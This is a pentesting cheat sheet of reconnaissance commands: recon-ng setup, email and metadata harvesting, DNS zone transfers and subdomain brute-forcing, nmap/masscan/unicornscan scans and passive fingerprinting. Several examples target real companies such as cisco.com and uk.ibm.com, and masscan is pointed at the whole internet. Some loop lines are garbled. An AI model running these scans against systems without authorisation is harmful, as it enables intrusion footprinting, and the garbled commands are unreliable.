openVPN running on a nonstanard port

semanage port -a -t openvpn_port_t -p udp 1195


recon-ng
keys list
##-========================================================-##
##   [+] start by adding twitter_api and twitter_secret
##-========================================================-##

Log in to Twitter, go to

https://apps.twitter.com/

Click on Create Application;
once the application is created,
navigate to the
Keys and Access Tokens tab
and copy the secret key and API key


Keys add twitter_api <your-copied-api-key>

Copy the API key, re-open the terminal window, and run the following command to add the key:

Keys add twitter_api <your-copied-api-key>
Now use the following command to enter the twitter_secret in recon-ng:

keys add  twitter_secret <you_twitter_secret>


add the Shodan API key. Adding the Shodan API key is fairly simple; all you need to do is create an account at https://shodan.io and click on My Account in the top-right corner. You will see the Account Overview page, where you can see a QR code image and API key,

Copy the API key shown in your account and add that in recon-ng using the following command:

keys add shodan_api <apikey>


show modules
use recon/domains-vulnerabilities/punkspider

Show module
use recon/domains-vulnerabilities/xssed
Show Options
Set source Microsoft.com
Show Options
RUN


use recon/contacts/gather/http/api/whois_pocs
[recon‐ng][default][whois_pocs] > show options
[recon-ng][default][whois_pocs] > set DOMAIN cisco.com
DOMAIN => cisco.com
[recon‐ng][recon-ng][default][whois_pocs] > run

use recon/hosts/enum/http/web/xssed
[recon‐ng][xssed] > set DOMAIN cisco.com
DOMAIN => cisco.com
[recon‐ng][xssed] > run

[recon‐ng]> use recon/hosts/gather/http/web/google_site
[recon‐ng][google_site] > set DOMAIN cisco.com
DOMAIN => cisco.com
[recon‐ng][google_site] > run

[recon‐ng]> use recon/hosts/gather/http/web/ip_neighbor
[recon‐ng][ip_neighbor] > set SOURCE cisco.com
SOURCE => cisco.com
[recon‐ng][ip_neighbor] > run


##  DNS   forward   brute-‐‐force   enumeration
for ip in $(cat list.txt);do host $ip.megacorpone.com;done


## probing  the  range  of  these found addresses  in  a  loop
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -‐v "not found"


ffprobe -show_streams $File
ffprobe -show_packets $File


GraphicsMagick


##-===================================-##
##   [+] Verbose Image Information
##-===================================-##
gm -identify -verbose $File


##-==========================================-##
##   [+] Extremely Verbose Debugging Info
##-==========================================-##
gm -identify -verbose -debug all $File


mogrify -strip $HOME/$Directory

+profile "*"                    ## remove all profiles
+profile "'*'" "'$File'"
+profile iptc


##-================================================-##
##   [+] print Exif data contained in the file:
##-================================================-##
gm -identify -format %[EXIF:$Tag]
gm -identify -format %[EXIF:*]                  ## print all Exif tags
gm -identify -format %[EXIF:GPSInfo]            ## print GPSInfo Exif tags
gm -identify -format %[EXIF:MakerNote]          ## print MakerNote Exif tags
gm -identify -format %[EXIF:UserComment]        ## print UserComment Exif tags


##-================================-##
##   [+] Extract Image Metadata:
##-================================-##
exif $File.jpg
exiftags -idav $File.jpg
exifprobe $File.jpg
exiv2 -Pkyct $File.jpg
exiftool -verbose -extractEmbedded $File.jpg
exiftool -a -G1 -s $File.jpg

##-======================================-##
##   [+] Extract Date/Time Information:
##-======================================-##
exiftool -time:all -a -G0:1 -s $File.jpg
exiftool -a -u -g1 $File.jpg


##-========================================-##
##   [+] Remove Metadata From $Dst image:
##-========================================-##
exiftool -all=  $File.png


##-=====================================-##
##   [+] Copy Values of Writable Tags
##   [+] From "src.jpg" To "$Dst.jpg"
##-=====================================-##
exiftool -TagsFromFile $Src.jpg -all:all $Dst.jpg


##-========================================-##
##   [+] Erase All Metadata From $Dst.jpg
##-========================================-##
##   [+] Copy The EXIF Tags From:
## -------------------------------- ##
##   [+] $Src.jpg -> $Dst.jpg
## -------------------------------- ##
exiftool -all= -tagsfromfile $src.jpg -exif:all $Dst.jpg


##-===================================-##
##   [+] Copy/Overwrite All Metadata
##-===================================-##
## ----------------------------------- ##
##   [?] "$Src.jpg" --> "$Dst.jpg"
## ----------------------------------- ##
##   [+] Delete All XMP Information
## ----------------------------------- ##
##   [+] Delete Thumbnail From $Dst
## ----------------------------------- ##
exiftool -tagsFromFile $a.jpg -XMP:All= -ThumbnailImage= -m $b.jpg


##-=================================-##
##   [+] Copy Metadata Information
##-=================================-##
## --------------------------------- ##
##   [?] $Src.jpg -> XMP Data File
## --------------------------------- ##
exiftool -Tagsfromfile $a.jpg $out.xmp


hachoir-metadata --level=9
hachoir-metadata --parser-list
hachoir-metadata --debug
hachoir-metadata --log=$File

hachoir-strip --strip=useless
hachoir-strip --strip=metadata


pdfextract $File.pdf


pdfxray_lite -f $File.pdf -r rpt_


peepdf -i


pdfid --verbose --scan $File.pdf

pdfid --verbose --scan --disarm --extra --output=$LogFile $File.pdf

pdfid --verbose --scan --disarm --all --output=$LogFile $File.pdf

pdfid --verbose --extra --scan $File.pdf

pdfid --verbose --plugins=$Plugin --scan $File.pdf


exiftool -exif:all      ## Display metadata
exiftool -exif:all=     ## Remove all metadata

exiftool -a -u -g1 $File
exiftool -k -a -u -g1 -w $OutFile $File


##-===============================================-##
##   [+]
##-===============================================-##
exiftool All= $File.jpg
jpegtran -copy all -outfile "$1"


dumppdf -a      # Dump all the objects. By default only the document trailer is printed.

dumppdf -i objno[,objno,...]        # Specifies PDF object IDs to display. Comma-separated IDs, or multiple -i options are accepted.

dumppdf -p pageno[,pageno,...]
           Specifies the comma-separated list of the page numbers to be
           extracted.

dumppdf -r option, the “raw” stream contents are dumped without
           decompression
           -b option, the decompressed contents are dumped
           as a binary blob.

dumppdf -t option, the decompressed contents are
           dumped in a text format, similar to repr() manner.
dumppdf -r or -b
           option is given, no stream header is displayed for the ease of
           saving it to a file.
dumppdf -T
           Show the table of contents.

dumppdf -P password
           Provides the user password to access PDF contents.

dumppdf -d
           Increase the debug level.


Dump all the headers and contents, except stream objects:
dumppdf -a $File.pdf

Dump the table of contents:
dumppdf -T $File.pdf

Extract a JPEG image:
dumppdf -r -i6 $File.pdf > $File.jpeg


## ----------------------------------------------------------------- ##
##   [+] metagoofil - information gathering tool designed
##                    for extracting metadata of public documents
##                    (pdf,doc,xls,ppt,docx,pptx,xlsx)
## ----------------------------------------------------------------- ##
metagoofil -d $Domain -t $File,pdf -l 100 -n 3 -o $DomainFiles
exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u


metagoofil -d uk.ibm.com -t doc,pdf -l 200 -n 50 -o ibmfiles

theharvester -d $Domain -b googleCSE -l 500 -s 300
metagoofil -d sina.com -t pdf -l 200 -o test -f 1.html

metagoofil -d $Domain -t doc,pdf -l 200 -n 50 -o $Files -f $Results.html
metagoofil -h yes -o $Files -f $Results.html        ## (local dir analysis)


metagoofil.py -d $target -t doc,xls,docx -l 200 -n 50 -o ~/Desktop/$target/metagoofil.tmp/ -f ~/Desktop/$target/users.html
cat ~/Desktop/$target/users.html | sed 's/useritem/\n/g' | grep '">' | grep -vE 'head' | awk -F "<" {'print $1'} | cut -d">" -f2 | sed -e "s/^ \{1,\}//" >> ~/Desktop/$target/users.txt


metagoofil -d $Domain -w -t pdf,doc,xls,ppt,docx,ppt -o $File


metagoofil -d $Domain -t $Filetype,$Filetype -l “# of results” -n “# of downloads” -o “specify directory to save in” -f “specify name and location of file save”


metagoofil -d $Domain -t $Filetype,$Filetype -l $NumResults -n $NumDownloads -o ~/$Dir/ -f /$Dir/$File.html

metagoofil -d $Domain -t $Filetype,$Filetype -l $NumResults -n $NumDownloads -o ~/$Dir/ -f /$Dir/$File.html

metagoofil -d $Domain -t pdf,doc,ppt -l 200 -n 5 -o ~/Downloads/metagoofil/ -f /root/Desktop/metagoofil/$Results.html

metagoofil -d $Domain -w -t pdf,doc,xls,ppt,docx,ppt -o $File


metagoofil -d <target>.com -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 200 -n 5 -o /tmp/metagoofil/ -f /tmp/metagoofil/result.html


##-====================================-##
##   [+] find subdomains available:
##-====================================-##
goorecon -s $Domain


##-==========================================-##
##   [+] Find email addresses for Domain:
##-==========================================-##
goorecon -e $Domain


## --------------------------------------------------------------------------------------------------- ##
theHarvester -d $Domain -l 50 -b google
theHarvester -d $Domain -l 50 -b bing
theHarvester -d $Domain -l 50 -b linkedin
## --------------------------------------------------------------------------------------------------- ##
theHarvester -d $Domain -b all          ## Search all, google, googleCSE, bing, bingapi, pgp,
theHarvester -d $Domain -b pgp          ##  > linkedin,google-profiles, jigsaw, twitter, googleplus
theHarvester -d $Domain -b bing
theHarvester -d $Domain -b google
theHarvester -d $Domain -b twitter
theHarvester -d $Domain -b jigsaw
theHarvester -d $Domain -b linkedin
## --------------------------------------------------------------------------------------------------- ##
theHarvester -d $Domain -n              ## Perform a DNS reverse query on all ranges discovered
theHarvester -d $Domain -c              ## Perform a DNS brute force for the domain name
theHarvester -d $Domain -t              ## Perform a DNS TLD expansion discovery
theHarvester -d $Domain -e $DNS         ## Specfic a dns server
theHarvester -d $Domain -h              ## use SHODAN database to query discovered hosts
## --------------------------------------------------------------------------------------------------- ##
theharvester -d $Domain -l 500 -b google -h $Domain.html
theharvester -d $Domain -b pgp
theharvester -d $Domain -l 200 -b linkedin
theharvester -d $Domain -b googleCSE -l 500 -s 300
## --------------------------------------------------------------------------------------------------- ##


##-==========================-##
##  [+] Harvester - Flags
##-==========================-##
theharvester -d $Domain -l $Limit -b $DataSource


##-=======================================-##
##  [+] Harvester Data Source - Twitter
##-=======================================-##
theharvester -d $Domain -l 500 -b twitter


##-==========================-##
##  [+] Harvester - Flags
##-==========================-##
theharvester -d $Domain -l $Limit -b $DataSource


##-===================================================-##
##  [+] Harvester Data Source - All Search Engines
##-===================================================-##
theharvester -d url -l 500 -b all -b all = all search engines


##-=======================================-##
##  [+] Harvester Data Source - Google
##-=======================================-##
theharvester -d $Domain -l 500 -b google
theharvester -d $Domain -b google > google.txt


##-=======================================-##
##  [+] Harvester Data Source - Twitter
##-=======================================-##
theharvester -d $Domain -l 500 -b twitter


##-======================================================-##
##  [+] Use SHODAN database to query discovered hosts
##-======================================================-##
theharvester -d $Domain -h > $Domain-SHODAN-Query.txt


##-=================================================================-##
##   [+]
##-=================================================================-##
automater -s robtex $IP


tracepath


tcptraceroute -i eth0 $Domain


mtr


nmap -PN -n -F -T4 -sV -A -oG $File.txt $Domain


amap -d $IP $PORT


browse to
http://127.0.0.1/unicornscan

epgsqldb


unicornscan -v $IP                 ## runs the default TCP SYN scan
unicornscan -v -m U $IP            ## scan type is supposed to be UDP
unicornscan X.X.X.X:a -r10000 -v
unicornscan 192.168.0.0/24:139              ## network wide scan on port 139:

unicornscan -mT -I 10.11.1.252:a -v
unicornscan -mU -I 10.11.1.252:p -v

unicornscan -mU -I 192.168.24.53:a -v -l unicorn_full_udp.txt ;  unicornscan -mT -I 192.168.24.53:a -v -l unicorn_full_tcp.txt


nslookup -> set type=any -> ls -d $Domain.com
for sub in $(cat subdomains.txt);do host $sub.$Domain.com|grep "has.address";done


##-==============-##
##  [+] MTR
##-==============-##
mtr $Domain


## ----------------------------------------------------------------------------------------- ##
    host -t ns $Domain.com                    # Show name servers
## ----------------------------------------------------------------------------------------- ##
    host -t mx $Domain.com                    # Show mail servers
## ----------------------------------------------------------------------------------------- ##
    host $Domain.com
## ----------------------------------------------------------------------------------------- ##
    host -l $Domain.com $NameServer          # Zone transfer
## ----------------------------------------------------------------------------------------- ##
    host -C $Domain                         ## SOA Records
## ----------------------------------------------------------------------------------------- ##
    host -a $Domain
## ----------------------------------------------------------------------------------------- ##
    host $IP
## ----------------------------------------------------------------------------------------- ##
    host -4
## ----------------------------------------------------------------------------------------- ##
    host -6
## ----------------------------------------------------------------------------------------- ##


##-===============================================================-##
##  [+] Use a bash loop to find the IP address behind each host
##-===============================================================-##
for url in $(cat list.txt); do host $url; done

##-=========================================================================-##
##  [+] Collect all the IP Addresses from a log file and sort by frequency
##-=========================================================================-##
cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn


## ----------------------------------------------------------------------------------------- ##
    dig +short +identify $Server                ## see what name server
                                                ## or whose cache is providing answers
## ----------------------------------------------------------------------------------------- ##
    dig +trace $Domain.com                      ## Debug DNS Tracing
## ----------------------------------------------------------------------------------------- ##
    dig $Domain.com | grep status               ## receive the NXDOMAIN status.
## ----------------------------------------------------------------------------------------- ##
    dig $Domain.com | grep Query                ## query time only
## ----------------------------------------------------------------------------------------- ##
    dig $Domain.com $Type                       ## a, mx, ns, soa, srv, txt, any
## ----------------------------------------------------------------------------------------- ##
    dig -x $TargetIP                            ## Pointer records
## ----------------------------------------------------------------------------------------- ##
    dig @$NameServerIP $Domain.com axfr         ## Zone transfer
## ----------------------------------------------------------------------------------------- ##
    dig @$NameServerIP $Domain.com afro         ## Forward zone transfer
## ----------------------------------------------------------------------------------------- ##
    dig @$IPAddr $Domain +norecurse             ## Non recursive query (cache lookup)
## ----------------------------------------------------------------------------------------- ##
    dig MX +short $Domain                       ## Perform MX Record Lookup
## ----------------------------------------------------------------------------------------- ##
    dig +short -t txt $@                        ## Sender Policy Framework (SPF) record
## ----------------------------------------------------------------------------------------- ##
    dig ns $Domain                              ## List the Name Servers for google.com
## ----------------------------------------------------------------------------------------- ##
    dig a $Domain.com @$Nameserver              ## Perform DNS IP Lookup
## ----------------------------------------------------------------------------------------- ##


##-============================================-##
##  [+] Query Wikipedia via console over DNS
##-============================================-##
dig +short txt <keyword>.wp.dg.cx


##-=============================-##
##  [+] Dig Debug DNS Tracing
##-=============================-##
dig +trace $Domain


##-==================================================-##
##  [+] Extract your external IP address using dig
##-==================================================-##
dig +short myip.opendns.com @resolver1.opendns.com


##-==================================================-##
##  [+] Reverse domain name resolution (PTR record)
##-==================================================-##
dig -x 220.181.14.155 +noall +answer


dig $Domain +nssearch


dig $Domain +nssearch | cut -d' ' -f4,11


dig +onesoa +nocomments +nocmd +nostats AXFR


dig +onesoa +nocomments +nocmd +nostats AXFR  @161.97.219.84


dig_tld () {
  /usr/bin/dig +onesoa +nocomments +nocmd +nostats AXFR $1 @$2 > output/$1.zone
  sed "/NSEC\|RRSIG\|DNSKEY\|SOA\|^$1\./d" < output/$1.zone > output/include/$1.zone
}

/usr/bin/dig +onesoa +nocomments +nocmd +nostats AXFR \. @161.97.219.84 > output/root.zone
sed "/NSEC\|RRSIG\|DNSKEY\|SOA\|^\./d" < output/root.zone > output/include/root.zone


dig +onesoa +nocomments +nocmd +nostats AXFR $1 @$2

query=""
for type in {A,AAAA,ALIAS,CNAME,MX,NS,PTR,SOA,SRV,TXT,DNSKEY,DS,NSEC,NSEC3,NSEC3PARAM,RRSIG,AFSDB,ATMA,CAA,CERT,DHCID,DNAME,HINFO,ISDN,LOC,MB,MG,MINFO,MR,NAPTR,NSAP,RP,RT,TLSA,X25} ; do
  dig +noall +short +noshort +answer $query $type ${1} 2>/dev/null
done


Query DNS bind version information Most DNS servers use BIND to query the version information of bind,
 not all DNS servers can query BIND information,
 most dns servers The protection mode is set
 and cannot be queried in this way.


dig +noall +answer $Domain ns


dig +noall +answer txt chaos VERSION.BIND ns3.sina.com.cn.


/etc/systemd/resolved.conf

DNS=

resolvectl status
resolvectl query


## ----------------------------------------------------------------------------------------- ##
    nslookup $Domain.com                    ## Query A and PTR Records
## ----------------------------------------------------------------------------------------- ##
    nslookup $Domain.com x.x.x.x            ## Query A and PTR record
                                            ## using a different name server
## ----------------------------------------------------------------------------------------- ##
    nslookup -debug google.com              ## Debug Mode for nslookup
## ----------------------------------------------------------------------------------------- ##
    nslookup -query=ns $Domain.com          ## Query Nameserver records
## ----------------------------------------------------------------------------------------- ##
    nslookup -querytype=mx $Domain.com      ## Query MX record
## ----------------------------------------------------------------------------------------- ##
    nslookup set type=mx $Domain.com        ## Interactive option
## ----------------------------------------------------------------------------------------- ##
    nslookup -norecursive $Domain.com       ## Non Recursive lookup
## ----------------------------------------------------------------------------------------- ##
    nslookup recursive $Domain.com          ## Recursive lookup
## ----------------------------------------------------------------------------------------- ##
    nslookup ns4.google.com                 ## Resolve the IP Address for ns4.google.com
## ----------------------------------------------------------------------------------------- ##


## ----------------------------------------------------------------------------------------- ##
    nslookup server $Server set type=any ls -d $Target      ## DNS zone transfer
## ----------------------------------------------------------------------------------------- ##


##-==========================-##
##  [+] DNS zone transfer
##-==========================-##

nslookup server $Server set type=any ls -d $Target      ## DNS zone transfer


##-==================================================-##
##  [+] return verbose information about a record
##-==================================================-##
set debug


dig $Domain.com +nssearch


dig $Domain.com +nssearch | cut -d' ' -f4,11


DNS lookups
Zone Transfers


whois $Domain.com
dig {a|txt|ns|mx} $Domain.com
dig {a|txt|ns|mx} $Domain.com @ns1.domain.com


host -t {a|txt|ns|mx} $Domain.com
host -a $Domain.com
host -l $Domain.com ns1.$Domain.com


host -T -l $Domain ns4.$Domain


dnsrecon -d $Domain.com -t axfr @ns2.$Domain.com


dnsenum $Domain.com


dnsrecon -d $Domain --lifetime 10 -t brt -D usr/share/dnsrecon/namelist.txt -x sina.xml


##-==================================================-##
##  [+] Dnsrecon DNS Brute Force

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml $File.xml


dnsenum -f /usr/share/dnsenum/dns.txt -dnsserver 8.8.8.8 $Domain -o $Domain.xml


##-======================================-##
##  [+] Dnsrecon DNS List of $Domain
##-======================================-##
dnsrecon -d $Domain -t axfr


##-=================-##
##  [+] DNSEnum
##-=================-##
dnsenum $Domain


## --------------------------------------------------------------------------------------------------------------------------------------------- ##
##    [?] enumerate DNS information of a domain and to discover non-contiguous ip blocks.
## --------------------------------------------------------------------------------------------------------------------------------------------- ##
dnsenum --verbose --noreverse -o $File.xml $Domain


dnsenum --verbose --file /usr/share/dnsenum/dns.txt -dnsserver 8.8.8.8 $Domain -o $Domain.xml


##-===============================================-##
##  [+] Write all valid subdomains to this file.
##-===============================================-##
## ------------------------------------------------------ ##
##  [?] Subdomains are taken from: NS and MX records,
##  [?] zonetransfer, google scraping,
##  [?] brute force and reverse lookup hostnames.
## ------------------------------------------------------ ##
dnsenum --verbose --subfile $File $Domain


##-==============================================================-##
##  [+] Read subdomains from this file to perform brute force.
##-==============================================================-##
dnsenum --verbose --file $File


##-==============================================-##
##  [+] Recursion on subdomains
##  [+] brute force all discovered subdomains
##-==============================================-##
dnsenum --verbose --recursion $Domain


http_proxy=http://127.0.0.1:8118/
HTTP_PROXY=http://127.0.0.1:8118/


allinurl: -www site:domain


## ------------------------------------------------------------------------------- ##
    dig @127.0.0.1 NS $Domain.com               ## To test the local server
    dig @204.97.212.10 NS MX $Domain.com        ## Query an external server
    dig AXFR @ns1.$Domain.org @$Domain.com      ## Get the full zone (zone transfer)
## ------------------------------------------------------------------------------- ##


##-=====================-##
##   [+] PING SWEEP
##-=====================-##
for x in {1 .. 254 .. l};do ping -c 1 l.l.l.$x lgrep "64 b" lcut -d" "-f4 ips.txt; done


##-============================-##
##   [+] DNS REVERSE LOOKUP
##-============================-##
for ip in {1 .. 254 .. 1}; do dig -x l.l.l.$ip |grep $ip dns.txt; done;


##-====================================================================-##
##   [+] Reverse Lookup Brute Force - find domains in the same range
##-====================================================================-##
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"


##-==========================================-##
##   [+] Dig - Find all of the signed TLDs:
##-==========================================-##
## ------------------------------------------ ##
##   [?] The RRSIG RRs will be supplied
## ------------------------------------------ ##
dig @xfr.lax.dns.icann.org . axfr > root-zone-file | grep DS root-zone-file


dig +dnssec $Domain.tld
dig +dnssec $Register.tld

dig +dnssec labs.nic.cz @localhost


dig @192.168.56.104 chaos version.bind txt
dig @<NameServer> chaos hostname.bind TXT
dig @<NameServer> chaos authors.bind TXT
dig @<NameServer> chaos ID.server TXT


## ----------------------------------------------------------------------------- ##
alias dns1="dig +short @resolver1.opendns.com myip.opendns.com"
alias dns2="dig +short @208.67.222.222 myip.opendns.com"
alias dns3="dig +short @208.67.220.220 which.opendns.com txt"
## ============================================================== ##


## Get your outgoing IP address

alias myip='dig +short myip.opendns.com @resolver1.opendns.com'
## ----------------------------------------------------------------------------- ##


0trace eth0 $Domain

itrace -i eth0 -d $Domain

intrace

tctrace -i eth0 -d $Domain

tcptraceroute -i eth0 $Domain


tcptrace -l -r o3 $File


##-====================================================-##
##   [+] Print List of Live Hosts on Local Network:
##-====================================================-##
genlist -s 192.168.1.\*


fierce --domain $Domain --subdomains accounts --traverse 10


##-============================================================================-##
##   [+] Limit nearby IP traversal to certain domains with the --search flag:
##-============================================================================-##
fierce --domain $Domain --subdomains admin --search $Domain $Domain


##-==================================================================================-##
##   [+] Attempt an HTTP connection on domains discovered with the --connect flag:
##-==================================================================================-##
fierce --domain $Domain --subdomains mail --connect


##-=========================-##
##  [+] Fierce
##-=========================-##
fierce -dns $Domain
fierce -dns $Domain -file $OutputFile
fierce -dns $Domain -dnsserver $Server
fierce -range $IPRange -dnsserver $Server
fierce -dns $Domain -wordlist $Wordlist
fierce -dnsserver $DNS -dns $Domain -wordlist /usr/share/fierce/hosts.txt


fierce -dns $Domain -threads 3


dnsenum.pl --enum -f $File.txt --update a -r $Domain >> ~/Enumeration/$domain


##-=====================================================================-##
##   [+] Search for the A record of $Domain on your local nameserver:
##-=====================================================================-##
dnstracer $Domain


##-=====================================================================-##
##   [+] Search for the MX record of $Domain on the root-nameservers:
##-=====================================================================-##
dnstracer "-s" . "-q" mx $Domain


##-=================================================================-##
##   [+] Search for the PTR record (hostname) of 212.204.230.141:
##-=================================================================-##
dnstracer "-q" ptr 141.230.204.212.in-addr.arpa


##-========================-##
##   [+] IPv6 addresses:
##-========================-##
dnstracer "-q" ptr "-s" . "-o" 2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.6.4.0.2.0.0.0.0.8.b.0.e.f.f.3.ip6.int


##-=================================================================-##
##   [+]
##-=================================================================-##
dnstop -l 3 eth0


dnswalk $Domain

## ------------------------------------------------------------- ##
##   [?] Print debugging and 'status' information to stderr
## ------------------------------------------------------------- ##


                                    ## ----------------------------------------------------------- ##
dnswalk -r -d $* $Domain.           ## Recursively descend sub-domains of the specified domain.
                                    ## Print debugging and 'status' information to stderr
                                    ## ----------------------------------------------------------- ##

                                    ## ---------------------------------------------------- ##
dnswalk -F $Domain                  ## perform "fascist" checking
                                    ## ---------------------------------------------------- ##
                                    ##  [?] When checking an A record,
                                    ##      compare the PTR name for each IP address
                                    ##      with the forward name and report mismatches.
                                    ## ---------------------------------------------------- ##

dmitry -p $Domain -f -b


dmitry -iwnse $Domain


##-================-##
##  [+] DNSMap
##-================-##
dnsmap -w $File.txt $Domain


## ----------------------------------------------------------- ##
##   [+] DNSenum - enumerate various DNS records, such as:
##                 NS, MX, SOA, and PTR records.
##   [?] DNSenum also tries to perform DNS zone transfer
## ----------------------------------------------------------- ##

dnsenum -p 5 -s 20 $Domain
dnsenum -f $File.txt $Domain
dnsenum -o dnsenum_info $Domain

dnsenum --enum -f $File.txt --update a -r $URL


dnsrecon -d $Domain -D /usr/share/wordlists/$File.txt -t std --xml $File.xml


## --------------------------------------------------------------------------------------- ##
    dnsrecon -t rvs -i 192.1.1.1,192.1.1.20         ## Reverse lookup for IP range:
## --------------------------------------------------------------------------------------- ##
    dnsrecon -t std -d $Domain                      ## Retrieve standard DNS records:
## --------------------------------------------------------------------------------------- ##
    dnsrecon -t brt -d $Domain -w $Hosts.txt        ## Enumerate subdornains:
## --------------------------------------------------------------------------------------- ##
    dnsrecon -d $Domain -t axfr                     ## DNS zone transfer:
## --------------------------------------------------------------------------------------- ##
    dnsrecon --type snoop -n $Server -D $Dict       ## Cache Snooping
## --------------------------------------------------------------------------------------- ##
    dnsrecon -d $Host -t zonewalk                   ## Zone Walking
## --------------------------------------------------------------------------------------- ##
    dnsrecon.py -d $Domain -D $Dict -t brt          ## Domain Brute-Force
## --------------------------------------------------------------------------------------- ##


dnsrecon.py -t brt,std,axfr -D /pentest/enumeration/dns/dnsrecon/namelist.txt -d $target


##-=======================================-##
##  [+] DNSRecon - DNS Brute Force Scan
##-=======================================-##
dnsrecon -t brt -d $Domain -D /$Dir/$File.txt


fierce -dns $URL


## ---------------------------------------------------------------------------- ##
##   [+] Lbd (load balancing detector)
##   [?] detects whether a given domain uses DNS and/or HTTP load-balancing
## ---------------------------------------------------------------------------- ##
lbd.sh $URL


## ---------------------------------------------------------------------- ##
##   [?] Halberd - HTTP-based load balancer detector.
##   [?]           checks for differences in the
##   [?]           HTTP response headers, cookies, timestamps, etc.
## ---------------------------------------------------------------------- ##
halberd $Domain


fragroute -f $Location $IP

fragrouter -i eth0 $options


nmap -n -Pn -p53 --script dns-zone-transfer --script-args dns-zone-transfer.domain=zonetransfer.me $Domain

nmap -PN -n -F -T4 -sV -A -oG $File.txt $URL

dnsenum --dnsserver $DNS --enum -f $File.txt --update a -r $URL

nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr $URL

amap -d $IP $PORT
amap -bqv 192.168.1.15 80


##-===============================================-##
##   [+]
##-===============================================-##


-a (alive)
-g (generate the host target list from cidr notation)
-c (count)
-p (period=msec)
-s (stats)
-C (per-target statistics)
-d (reverse-DNS lookup) -q (quiet)
-s (print cumulative statistics upon exit)


## ---------------------------------------------------------------------- ##
    fping -a -q -g $2               ## Generate Alive Hosts From File
## ---------------------------------------------------------------------- ##
    fping -g $IP $IP                ## Generate Host List:
## ---------------------------------------------------------------------- ##
    fping -s $Domain                ## Display Statistics:
## ---------------------------------------------------------------------- ##
    fping < $File                   ## ping addresses read from a file
## ---------------------------------------------------------------------- ##
    fping -ag 192.0.2.0/24          ## Find hosts in a given subnet
## ---------------------------------------------------------------------- ##
    fping $IP -s -c 10000 -p 100    ## send high rate of
                                    ## echo-request packets
## ---------------------------------------------------------------------- ##


## --------------------------------------------------------- ##
##   [?] Use fping to test reachability to range of hosts
##       using bash for loop to define hosts
## --------------------------------------------------------- ##
for i in {1..5} ; do fping -C 3 -d -q -s -g 10.0.2$i.100 10.0.2$i.150 ; done


##-===============================================-##
##   [+] nping - Network packet generation tool
##-===============================================-##


## ---------------------------------------------------------------------- ##
##   [?] Echo Mode - see how the generated probes change in transit
##   [?] Revealing the differences between the transmitted packets
##   [?] And the packets received at the other end
## ---------------------------------------------------------------------- ##


##-================================-##
##   [+] nping - TCP Probe Mode:
##-================================-##
nping -c 1 --tcp -p 80,433 $Domain


nping --tcp-connect         ## Unprivileged TCP connect probe mode.
nping --tcp                 ## TCP probe mode.
nping --udp                 ## UDP probe mode.
nping --icmp                ## ICMP probe mode.
nping --arp                 ## ARP/RARP probe mode.
nping --traceroute          ## Traceroute mode


##-================================-##
##   [+] nping - TCP CONNECT MODE
##-================================-##
nping --dest-port                   ## Set destination port(s)
nping --source-port $Port           ## Try to use a custom source port


nping --interface


##-================================-##
##   [+] nping - IPv6 OPTIONS:
##-================================-##
nping --IPv6
nping --dest-ip


nping --dest-mac                    ## Set destination mac address
nping --source-mac <mac>               ## Set source MAC address.
nping --ether-type <type>           ## Set EtherType value.


nping --source-ip $SrcAddr      ## Set source IP address.
nping --dest-ip $DstAddr        ## Set destination IP address
nping --tos $TOS                ## Set type of service field (8bits).
nping --id  $ID                 ## Set identification field (16 bits).
nping --df                      ## Set Dont Fragment flag.
nping --mf                      ## Set More Fragments flag.
nping --ttl $Hops               ## Set time to live

nping -send-eth                       : Send packets at the raw ethernet layer.
nping --send-ip                        : Send packets using raw IP sockets.
nping --bpf-filter <filter spec>       : Specify custom BPF filter


nping --tcp -p 80 --flags rst --ttl 2 192.168.1.1
nping --icmp --icmp-type time --delay 500ms 192.168.254.254
nping --echo-server "public" -e wlan0 -vvv
nping --echo-client "public" $Domain --tcp -p1-1024 --flags ack


nping -c 1 --tcp -p 22 --flags syn $IP

nping -tcp -p 445 -data hexdata(AF56A43D) $IP


amass -src -ip -active -exclude crtsh -d $DOMAIN
amass -src -ip -active -brute --min-for-recursive 3 -exclude crtsh -w $WORDLIST -d $DOMAIN


##-==============================================-##
##   [+] Run massdns to determine online hosts
##-==============================================-##
massdns -r $RESOLVERS -q -t A -o -S -w $File.out $File-merged.txt
cat $File.out | awk '{print $1}' | sed 's/\.$//' | sort -u >> $File-online.txt


massdns -r lists/resolvers.txt -t A -q -o S $File.txt


##-============================================================================-##
##   [+] Produce a list of IP addresses corresponding to the target's FQDNs:
##-============================================================================-##
cat $File.out | awk '{split($0,a," "); print a[3]}' | sort | uniq >> $File-FQDNs.txt


Masscan
masscan -p8983 --range 0.0.0.0/0 --banners --rate 100000000 -oG masscanips
masscan --udp-ports 161


grep ipaddresses with regex

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $File.txt
grep -oP '(?<=Host: )\S*' $File


masscan -p1-65535 $(dig +short $1|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head - --max-rate 1000


## ------------------------------------------------- ##
##   [?] p0f - passive os fingerprinting utility
## ------------------------------------------------- ##
p0f -i eth0
p0f -i wlan0


##-=========================================================-##
##   [+] Set iface to promiscuous mode, dump to log file:
##-=========================================================-##
p0f -i eth0 -p -d -o $File.log
p0f -i wlan0 -p -d -o $File.log


##-============================================-##
##   [+] p0f - Read from offline PCAP $File:
##-============================================-##
p0f -r $File


##-======================================================-##
##   [+] p0f - Filter Traffic - Source Port - FTP-Data
##-======================================================-##
p0f -r $File 'src port ftp-data'
p0f -i wlan0 'src port ftp-data'


##-====================================================================================-##
##   [+] p0f - Filter Traffic - NOT Destination Network 10.0.0.0 & Netmask 255.0.0.0
##-====================================================================================-##
p0f -r $File 'not dst net 10.0.0.0 mask 255.0.0.0'
p0f -i wlan0 'not dst net 10.0.0.0 mask 255.0.0.0'


##-=============================================================-##
##   [+] p0f - Filter Traffic - Destination Port 80 & $SrcIP
##-=============================================================-##
p0f -r $File 'dst port 80 and ( src host $SrcIP or src host $SrcIP )'
p0f -i wlan0 'dst port 80 and ( src host $SrcIP or src host $SrcIP )'


